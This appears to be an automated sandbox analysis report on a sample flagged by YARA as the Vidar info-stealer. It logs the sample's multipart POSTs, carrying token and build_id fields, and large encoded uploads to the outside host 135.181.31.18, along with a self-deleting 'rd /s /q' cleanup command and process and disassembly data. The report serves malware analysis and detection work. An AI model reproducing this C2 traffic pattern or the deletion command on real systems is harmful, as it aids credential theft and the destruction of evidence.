                                                                                                                                                                                    2024-09-28 01:29:58 UTC16355OUTData Raw: 57 61 66 41 59 62 46 58 73 70 42 48 48 72 58 6c 33 69 43 77 2f 73 33 57 5a 72 62 79 31 6a 32 34 62 59 72 37 67 4d 6a 50 42 77 50 58 30 72 74 4c 50 58 4e 53 30 33 58 72 4b 77 75 4e 49 6a 30 37 52 35 33 65 31 74 6f 78 6a 63 48 42 34 59 34 39 54 2f 41 44 7a 7a 31 50 4e 65 4f 50 38 41 6b 62 4c 76 2f 64 6a 2f 41 50 51 42 58 58 6c 74 4f 56 4c 45 70 58 30 61 5a 35 32 63 54 68 56 77 6a 6c 62 56 4e 48 4f 55 63 55 74 4a 78 58 30 64 7a 35 49 4b 4b 4b 4b 41 4c 33 68 66 58 74 4d 30 33 78 4a 61 58 56 33 63 2b 58 42 48 76 33 4e 73 5a 73 5a 52 67 4f 41 4d 39 53 4b 39 49 2f 34 57 52 34 54 2f 41 4f 67 74 2f 77 43 53 38 76 38 41 38 54 58 6b 65 6a 36 44 61 61 70 34 56 31 75 2f 38 79 59 58 32 6e 68 4a 45 51 4d 4e 6a 49 54 7a 6b 59 7a 77 41 33 66 30 72 57 31 6a 77 4c 46 59 2b
                                                                                                                                                                                    Data Ascii: WafAYbFXspBHHrXl3iCw/s3WZrby1j24bYr7gMjPBwPX0rtLPXNS03XrKwuNIj07R53e1toxjcHB4Y49T/ADzz1PNeOP8AkbLv/dj/APQBXXltOVLEpX0aZ52cThVwjlbVNHOUcUtJxX0dz5IKKKKAL3hfXtM03xJaXV3c+XBHv3NsZsZRgOAM9SK9I/4WR4T/AOgt/wCS8v8A8TXkej6Daap4V1u/8yYX2nhJEQMNjITzkYzwA3f0rW1jwLFY+
                                                                                                                                                                                    2024-09-28 01:29:58 UTC16355OUTData Raw: 55 55 41 42 6f 6f 70 4b 59 42 51 61 4b 4b 42 69 55 55 70 70 4b 41 45 6f 70 61 53 6d 4d 4b 4b 4b 4b 41 43 6b 70 61 4f 61 41 45 78 53 55 76 61 69 6d 4d 53 69 67 30 55 41 4a 52 53 30 55 37 67 4a 52 52 69 6b 78 51 55 4c 6e 46 4f 45 68 37 38 6a 33 70 6c 46 4d 56 6b 50 2f 64 74 31 58 48 75 4b 62 35 49 50 33 58 2f 41 41 4e 4a 52 52 5a 44 31 47 4e 45 36 39 52 54 4b 73 42 79 4f 39 4b 58 44 66 65 55 47 6c 59 66 4d 79 74 52 55 35 6a 6a 62 6f 53 50 72 54 47 67 66 2b 48 35 68 37 55 72 46 4b 53 49 7a 53 48 70 53 6b 45 64 52 69 6a 6d 67 61 47 30 55 74 49 61 42 69 55 55 74 46 4d 59 6c 4a 53 30 55 42 63 53 6b 70 61 4b 42 6a 65 61 58 6d 69 67 30 44 45 4e 4a 53 30 6c 41 30 47 4b 53 6c 6f 4e 4d 42 43 4b 62 54 71 4d 55 44 47 69 67 30 76 46 4a 51 4d 51 30 6e 61 6e 55 6d 4b 51
                                                                                                                                                                                    Data Ascii: UUABoopKYBQaKKBiUUppKAEopaSmMKKKKACkpaOaAExSUvaimMSig0UAJRS0U7gJRRikxQULnFOEh78j3plFMVkP/dt1XHuKb5IP3X/AANJRRZD1GNE69RTKsByO9KXDfeUGlYfMytRU5jjboSPrTGgf+H5h7UrFKSIzSHpSkEdRijmgaG0UtIaBiUUtFMYlJS0UBcSkpaKBjeaXmig0DENJS0lA0GKSloNMBCKbTqMUDGig0vFJQMQ0nanUmKQ
                                                                                                                                                                                    2024-09-28 01:29:58 UTC16355OUTData Raw: 6c 47 4a 57 6b 51 6f 53 57 43 6e 47 51 79 67 37 52 78 31 7a 41 62 53 38 47 68 57 65 6a 69 33 55 4c 62 79 37 32 75 51 63 74 49 67 4c 46 49 79 50 52 57 6b 6b 50 2f 41 76 61 72 55 73 64 7a 64 66 36 66 54 30 56 6a 4e 77 79 7a 6c 33 58 6c 38 6b 74 2f 56 33 4e 31 43 57 6a 55 6e 71 51 44 53 34 72 50 61 2f 6c 2b 30 73 77 30 57 63 52 47 61 52 67 76 32 70 75 45 5a 63 49 75 66 39 6c 76 6d 7a 33 36 47 72 73 47 2f 79 45 33 35 33 59 35 7a 58 72 30 71 72 71 66 5a 61 39 54 77 4b 39 42 55 72 4e 53 54 76 32 48 30 55 55 56 73 63 34 47 6b 70 54 53 55 41 46 46 46 46 41 78 4f 61 57 69 69 67 41 70 4d 55 74 46 41 43 55 55 55 55 44 43 6b 70 61 4b 41 45 6f 6f 6f 6f 41 4b 53 67 30 55 78 68 52 52 52 54 41 4b 4b 4b 4f 39 41 43 55 55 74 4a 53 47 46 4a 53 30 55 77 45 6f 6f 4e 46 41 42
                                                                                                                                                                                    Data Ascii: lGJWkQoSWCnGQyg7Rx1zAbS8GhWeji3ULby72uQctIgLFIyPRWkkP/AvarUsdzdf6fT0VjNwyzl3Xl8kt/V3N1CWjUnqQDS4rPa/l+0sw0WcRGaRgv2puEZcIuf9lvmz36GrsG/yE353Y5zXr0qrqfZa9TwK9BUrNSTv2H0UUVsc4GkpTSUAFFFFAxOaWiigApMUtFACUUUUDCkpaKAEooooAKSg0UxhRRRTAKKKO9ACUUtJSGFJS0UwEooNFAB
                                                                                                                                                                                    2024-09-28 01:29:58 UTC16355OUTData Raw: 38 43 78 2b 62 34 4c 6d 58 79 2f 4d 2f 34 6d 4c 48 48 6c 37 2f 41 50 6c 6d 76 62 79 33 2f 6c 2b 50 72 36 65 62 66 37 73 2f 56 48 6d 5a 54 2f 76 4b 39 47 64 46 61 32 75 32 38 67 62 37 4c 74 78 49 70 7a 39 6d 78 6a 6e 31 2b 7a 6a 48 35 6a 36 69 75 46 31 72 2f 6b 50 61 68 2f 31 38 79 66 38 41 6f 52 72 76 37 48 54 58 61 61 4f 64 62 65 4a 56 53 51 45 37 6b 56 47 34 77 65 41 59 46 50 35 45 66 57 75 41 31 72 2f 6b 4f 36 68 2f 31 38 79 66 2b 68 47 76 4d 79 62 2b 4f 2f 54 39 55 64 50 45 6e 2b 36 78 2f 77 41 53 2f 4a 6c 47 69 69 69 76 70 44 34 6f 4b 4b 4b 4b 41 50 58 4c 62 2f 6a 7a 68 2f 33 46 2f 6c 54 6e 31 43 65 32 55 72 4e 70 38 37 51 59 2b 57 61 44 39 34 50 78 55 66 4d 50 77 42 71 4f 32 50 38 41 6f 6b 50 2b 34 76 38 41 4b 75 53 69 38 5a 53 36 64 34 7a 31 4b 32
                                                                                                                                                                                    Data Ascii: 8Cx+b4LmXy/M/4mLHHl7/APlmvby3/l+Pr6ebf7s/VHmZT/vK9GdFa2u28gb7LtxIpz9mxjn1+zjH5j6iuF1r/kPah/18yf8AoRrv7HTXaaOdbeJVSQE7kVG4weAYFP5EfWuA1r/kO6h/18yf+hGvMyb+O/T9UdPEn+6x/wAS/JlGiiivpD4oKKKKAPXLb/jzh/3F/lTn1Ce2UrNp87QY+WaD94PxUfMPwBqO2P8AokP+4v8AKuSi8ZS6d4z1K2
                                                                                                                                                                                    2024-09-28 01:29:58 UTC16355OUTData Raw: 46 39 66 77 2f 72 2b 72 68 2f 71 35 57 61 54 55 31 72 2b 76 38 41 58 35 39 69 78 52 57 54 42 71 64 7a 66 61 66 70 75 6f 58 4d 6d 6c 43 4f 65 5a 30 78 61 52 43 46 30 59 42 53 55 63 42 46 42 77 43 43 44 6c 75 70 35 72 54 45 30 54 48 43 79 6f 54 36 42 68 58 66 51 72 71 74 47 2b 78 35 47 4c 77 6b 73 50 50 6c 65 6f 2b 69 69 6b 56 67 4e 53 30 78 47 56 57 53 57 2b 67 6a 64 57 47 51 56 4c 67 45 45 56 72 4f 58 4a 46 79 37 48 50 53 67 36 6b 31 42 64 52 61 6a 6b 67 69 6c 49 4d 6b 53 50 6a 70 75 55 47 73 69 34 75 49 6b 30 44 58 4a 34 64 55 30 36 37 6d 68 73 33 65 4e 49 59 35 74 79 48 7a 6f 78 75 47 2b 4a 51 4d 41 6b 63 48 50 50 70 57 70 72 65 6f 57 31 72 72 74 37 65 52 32 36 4a 70 64 6f 38 77 75 6f 30 47 31 46 65 46 67 41 6e 48 54 7a 4e 30 51 48 75 35 39 44 58 6d 53
                                                                                                                                                                                    Data Ascii: F9fw/r+rh/q5WaTU1r+v8AX59ixRWTBqdzfafpuoXMmlCOeZ0xaRCF0YBSUcBFBwCCDlup5rTE0THCyoT6BhXfQrqtG+x5GLwksPPleo+iikVgNS0xGVWSW+gjdWGQVLgEEVrOXJFy7HPSg6k1BdRajkgilIMkSPjpuUGsi4uIk0DXJ4dU067mhs3eNIY5tyHzoxuG+JQMAkcHPPpWpreoW1rrt7eR26Jpdo8wuo0G1FeFgAnHTzN0QHu59DXmS
                                                                                                                                                                                    2024-09-28 01:29:58 UTC16355OUTData Raw: 67 61 44 78 54 63 35 70 4b 42 32 46 4c 65 31 4a 6b 30 6e 61 69 67 59 55 6c 4c 53 55 68 6f 4b 53 6c 70 44 51 4d 53 69 69 69 67 42 4b 4d 30 55 6c 41 77 70 4b 57 6b 6f 47 68 4b 4b 55 30 6c 41 78 4b 4b 4b 4b 42 69 47 6b 70 61 53 6d 4d 4b 53 6c 70 4b 42 6f 51 30 47 67 30 47 67 45 4a 53 55 47 67 30 46 42 53 55 70 70 76 61 67 61 46 70 4b 4b 4b 41 45 4e 4a 53 30 6c 42 51 47 6b 70 54 53 47 67 59 6c 4a 53 30 6c 41 78 4b 4b 44 52 6d 67 59 55 30 30 74 49 61 42 68 53 45 30 55 64 71 42 6f 53 6b 70 61 54 4e 41 41 65 6c 4a 6d 69 69 67 6f 44 30 70 4b 55 39 4b 62 7a 51 4d 55 2b 39 4e 70 63 30 6e 61 67 59 6e 46 42 6f 36 6d 69 67 42 4b 42 31 34 6f 6f 6f 4b 51 65 74 49 61 58 39 61 51 39 4f 74 41 78 4b 4d 30 47 6b 4a 39 36 42 68 6a 2f 4a 6f 36 55 55 33 74 54 42 43 2f 77 41 36
                                                                                                                                                                                    Data Ascii: gaDxTc5pKB2FLe1Jk0naigYUlLSUhoKSlpDQMSiiigBKM0UlAwpKWkoGhKKU0lAxKKKKBiGkpaSmMKSlpKBoQ0Gg0GgEJSUGg0FBSUppvagaFpKKKAENJS0lBQGkpTSGgYlJS0lAxKKDRmgYU00tIaBhSE0UdqBoSkpaTNAAelJmiigoD0pKU9KbzQMU+9Npc0nagYnFBo6migBKB14oooKQetIaX9aQ9OtAxKM0GkJ96Bhj/Jo6UU3tTBC/wA6
                                                                                                                                                                                    2024-09-28 01:29:58 UTC15080OUTData Raw: 41 44 37 58 33 50 38 41 7a 4f 71 38 55 65 4b 4c 48 57 39 4d 6a 74 72 61 4b 34 56 31 6d 45 68 4d 71 71 42 67 4b 77 37 45 2b 74 63 6c 53 77 71 39 77 59 52 42 44 4e 4b 5a 39 33 6b 69 4f 4a 6d 38 7a 62 39 37 62 67 63 34 37 34 6f 6b 56 34 70 33 67 6c 6a 6b 69 6d 54 37 30 63 69 46 57 58 36 67 38 31 33 59 61 6c 53 6f 52 39 6e 42 33 36 6e 6c 59 37 45 56 38 56 4e 56 61 73 62 57 56 74 45 37 64 2b 76 71 4a 52 53 64 71 4f 31 64 5a 77 43 30 6c 46 46 41 42 52 52 53 48 70 51 4d 57 6b 6f 6f 6f 41 4b 4b 4b 53 67 41 6f 6f 6f 6f 47 46 4a 53 30 6c 41 42 52 52 52 51 4d 4b 53 67 30 55 41 46 46 46 4a 51 4d 4b 4b 4b 4b 41 45 6f 6f 6f 6f 47 46 4a 51 61 4b 41 43 6b 6f 4e 46 4d 59 55 6c 4c 53 55 67 43 6b 4e 4c 53 66 6a 54 47 46 46 46 46 41 43 55 55 55 55 41 4a 52 52 52 51 4d 44 53
                                                                                                                                                                                    Data Ascii: AD7X3P8AzOq8UeKLHW9MjtraK4V1mEhMqqBgKw7E+tclSwq9wYRBDNKZ93kiOJm8zb97bgc474okV4p3gljkimT70ciFWX6g813YalSoR9nB36nlY7EV8VNVasbWVtE7d+vqJRSdqO1dZwC0lFFABRRSHpQMWkoooAKKKSgAooooGFJS0lABRRRQMKSg0UAFFFJQMKKKKAEooooGFJQaKACkoNFMYUlLSUgCkNLSfjTGFFFFACUUUUAJRRRQMDS
                                                                                                                                                                                    2024-09-28 01:30:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:30:00 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-09-28 01:30:00 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    14192.168.2.749722135.181.31.184436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:30:00 UTC305OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----AFHDHCAAKECFIDHIEBAK
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 135.181.31.18
                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:30:00 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------AFHDHCAAKECFIDHIEBAKCont
                                                                                                                                                                                    2024-09-28 01:30:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:30:01 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-09-28 01:30:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    15192.168.2.749724135.181.31.184436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:30:02 UTC305OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBG
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 135.181.31.18
                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:30:02 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------EBAFBGIDHCBFHIECFCBGCont
                                                                                                                                                                                    2024-09-28 01:30:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:30:03 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-09-28 01:30:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Statistics

                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                    Behavior

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    System Behavior

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                    Start time:21:29:04
                                                                                                                                                                                    Start date:27/09/2024
                                                                                                                                                                                    Path:C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\bind.aspx.exe"
                                                                                                                                                                                    Imagebase:0x340000
                                                                                                                                                                                    File size:5'424'128 bytes
                                                                                                                                                                                    MD5 hash:9C49281D063296A545C79BF288D4C3BF
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000000.1269068193.000000000035E000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                    Start time:23:02:03
                                                                                                                                                                                    Start date:27/09/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCAEHDBAAECB" & exit
                                                                                                                                                                                    Imagebase:0x410000
                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                    Start time:23:02:03
                                                                                                                                                                                    Start date:27/09/2024
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                    Start time:23:02:03
                                                                                                                                                                                    Start date:27/09/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:timeout /t 10
                                                                                                                                                                                    Imagebase:0xbf0000
                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Disassembly

                                                                                                                                                                                    Reset < >

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:6.6%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:20.3%
                                                                                                                                                                                      Signature Coverage:6.3%
                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                      Total number of Limit Nodes:83
                                                                                                                                                                                      execution_graph 87222 61e7f656 87223 61e7f6ad 87222->87223 87226 61e16404 free 87223->87226 87225 61e7f6c4 87226->87225 87227 61e597a7 87228 61e597b4 87227->87228 87229 61e597c4 87227->87229 87253 61e1aec6 free realloc malloc 87228->87253 87243 61e15172 87229->87243 87232 61e59863 87256 61e165ec 87232->87256 87233 61e59804 87233->87232 87237 61e5983d 87233->87237 87238 61e59868 87233->87238 87234 61e59893 87234->87232 87239 61e5aea6 87234->87239 87254 61e1a7b6 free realloc malloc 87237->87254 87238->87234 87255 61e29e56 free memmove realloc malloc 87238->87255 87261 61e69e8f 31 API calls 87239->87261 87242 61e5ae99 87244 61e15187 87243->87244 87245 61e1522e 87243->87245 87244->87245 87246 61e151bd 87244->87246 87247 61e0cb60 30 API calls 87244->87247 87245->87233 87262 61e0cb60 87246->87262 87247->87246 87249 61e151db 87249->87245 87250 61e0cb60 30 API calls 87249->87250 87251 61e15206 87250->87251 87251->87245 87252 61e0cb60 30 API calls 87251->87252 87252->87245 87253->87229 87254->87232 87255->87234 87257 61e165fc 87256->87257 87259 61e165a3 87256->87259 87257->87242 87259->87256 87260 61e0aee0 free 87259->87260 87630 61e1658e 87259->87630 87260->87259 87261->87242 87263 61e0cca6 87262->87263 87264 61e0cb68 87262->87264 87263->87249 87265 61e0cb7b 87264->87265 87266 61e0cb60 30 API calls 87264->87266 87268 61e75f1f 87264->87268 87265->87249 87266->87264 87269 61e75fd0 87268->87269 87270 61e75f53 87268->87270 87269->87264 87270->87269 87271 61e75fa8 87270->87271 87314 61e1aaa4 free realloc malloc 87270->87314 87271->87269 87305 61e1af14 87271->87305 87275 61e76667 87275->87269 87327 61e1a7b6 free realloc malloc 87275->87327 87276 61e761a9 87318 61e1a7b6 free realloc malloc 87276->87318 87280 61e1ad86 free realloc malloc 87300 61e75fe4 87280->87300 87282 61e24fdf free realloc malloc 87299 61e762e8 87282->87299 87285 61e0cb60 30 API calls 87285->87300 87287 61e1a7b6 free realloc malloc 87287->87300 87289 61e1aaa4 free realloc malloc 87289->87300 87290 61e2086f free realloc malloc 87290->87299 87292 61e767d1 87328 61e0aee0 87292->87328 87293 61e1cc77 free realloc malloc 87293->87299 87294 61e1ba4a 30 API calls 87294->87300 87299->87269 87299->87275 87299->87282 87299->87290 87299->87293 87322 61e20759 free realloc malloc 87299->87322 87323 61e1ad86 free realloc malloc 87299->87323 87324 61e1a7b6 free realloc malloc 87299->87324 87325 61e27289 free realloc malloc 87299->87325 87326 61e24de7 free realloc malloc 87299->87326 87300->87269 87300->87276 87300->87280 87300->87285 87300->87287 87300->87289 87300->87292 87300->87294 87300->87299 87301 61e769f5 87300->87301 87302 61e593bd free realloc malloc strcmp GetSystemInfo 87300->87302 87303 61e76150 87300->87303 87310 61e75edb 87300->87310 87315 61e29a02 87300->87315 87320 61e6b5bb 30 API calls 87300->87320 87321 61e24a13 free realloc malloc 87300->87321 87333 61e1aec6 free realloc malloc 87300->87333 87334 61e1a7b6 free realloc malloc 87301->87334 87302->87300 87319 61e1a7b6 free realloc malloc 87303->87319 87306 61e1af54 87305->87306 87307 61e1af18 87305->87307 87306->87300 87308 61e1af33 87307->87308 87335 61e1aec6 free realloc malloc 87307->87335 87308->87300 87311 61e75ef1 87310->87311 87336 61e75c77 87311->87336 87313 61e75f17 87313->87300 87314->87271 87600 61e1a755 87315->87600 87318->87269 87319->87269 87320->87300 87321->87300 87322->87299 87323->87299 87324->87299 87325->87299 87326->87299 87327->87269 87329 61e0aef0 87328->87329 87331 61e0ae85 87328->87331 87329->87269 87332 61e0adeb 87331->87332 87626 61e0ae03 87331->87626 87332->87269 87333->87300 87334->87269 87335->87308 87337 61e75ca7 87336->87337 87342 61e75c90 87336->87342 87370 61e757ae 87337->87370 87339 61e75eb6 87385 61e1a7b6 free realloc malloc 87339->87385 87340 61e75e90 87384 61e1a7b6 free realloc malloc 87340->87384 87341 61e75da8 87341->87339 87341->87340 87346 61e75cb0 87341->87346 87342->87341 87345 61e75d3a 87342->87345 87342->87346 87374 61e23bfe free realloc malloc 87342->87374 87345->87341 87345->87346 87375 61e1aaa4 free realloc malloc 87345->87375 87346->87313 87348 61e75d7e 87348->87341 87376 61e1ad86 free realloc malloc 87348->87376 87350 61e75d93 87351 61e75dad 87350->87351 87352 61e75d99 87350->87352 87377 61e1ad86 free realloc malloc 87351->87377 87354 61e0aee0 free 87352->87354 87354->87341 87356 61e75ddd 87378 61e24945 free realloc malloc 87356->87378 87358 61e75de8 87379 61e24945 free realloc malloc 87358->87379 87360 61e75df3 87380 61e1ad86 free realloc malloc 87360->87380 87362 61e75dfd 87381 61e24945 free realloc malloc 87362->87381 87364 61e75e08 87382 61e29a18 free realloc malloc 87364->87382 87366 61e75e24 87366->87346 87383 61e1a7b6 free realloc malloc 87366->87383 87368 61e75e3f 87369 61e0aee0 free 87368->87369 87369->87346 87371 61e757c2 87370->87371 87372 61e757be 87370->87372 87386 61e7571b 87371->87386 87372->87342 87374->87345 87375->87348 87376->87350 87377->87356 87378->87358 87379->87360 87380->87362 87381->87364 87382->87366 87383->87368 87384->87346 87385->87346 87387 61e75751 87386->87387 87390 61e75744 87386->87390 87392 61e753be 87387->87392 87389 61e75768 87389->87372 87390->87389 87391 61e753be 30 API calls 87390->87391 87391->87390 87421 61e885c9 87392->87421 87394 61e75485 87394->87390 87395 61e7545e 87395->87394 87403 61e754d2 87395->87403 87404 61e754da 87395->87404 87440 61e4c7c5 87395->87440 87396 61e756df 87496 61e16f42 free 87396->87496 87400 61e754b4 87401 61e754c1 87400->87401 87400->87404 87489 61e1ae16 free realloc malloc 87401->87489 87403->87394 87403->87396 87495 61e1a839 free realloc malloc 87403->87495 87406 61e7553c 87404->87406 87490 61e23a4e free realloc malloc 87404->87490 87405 61e755ad 87491 61e1ae16 free realloc malloc 87405->87491 87406->87405 87407 61e755c6 87406->87407 87410 61e29a02 3 API calls 87407->87410 87411 61e7560c 87410->87411 87455 61e75015 87411->87455 87414 61e75647 87415 61e0aee0 free 87414->87415 87416 61e75667 87415->87416 87417 61e75675 87416->87417 87492 61e752d9 25 API calls 87416->87492 87420 61e755c1 87417->87420 87493 61e16f9b free 87417->87493 87420->87394 87420->87403 87494 61e52f4f 22 API calls 87420->87494 87422 61e885e9 87421->87422 87424 61e885fd 87421->87424 87423 61e885f2 87422->87423 87427 61e88607 87422->87427 87497 61e2ae36 free realloc malloc 87423->87497 87424->87395 87428 61e88640 87427->87428 87432 61e8860d 87427->87432 87431 61e88687 87428->87431 87498 61e2ae36 free realloc malloc 87428->87498 87430 61e886f3 87502 61e5655a 24 API calls 87430->87502 87431->87430 87434 61e886ec 87431->87434 87435 61e886f5 87431->87435 87432->87424 87503 61e2ae36 free realloc malloc 87432->87503 87499 61e1a839 free realloc malloc 87434->87499 87435->87430 87500 61e2d35e free realloc malloc 87435->87500 87438 61e88706 87501 61e2ae36 free realloc malloc 87438->87501 87453 61e4c7e7 87440->87453 87442 61e4ccf1 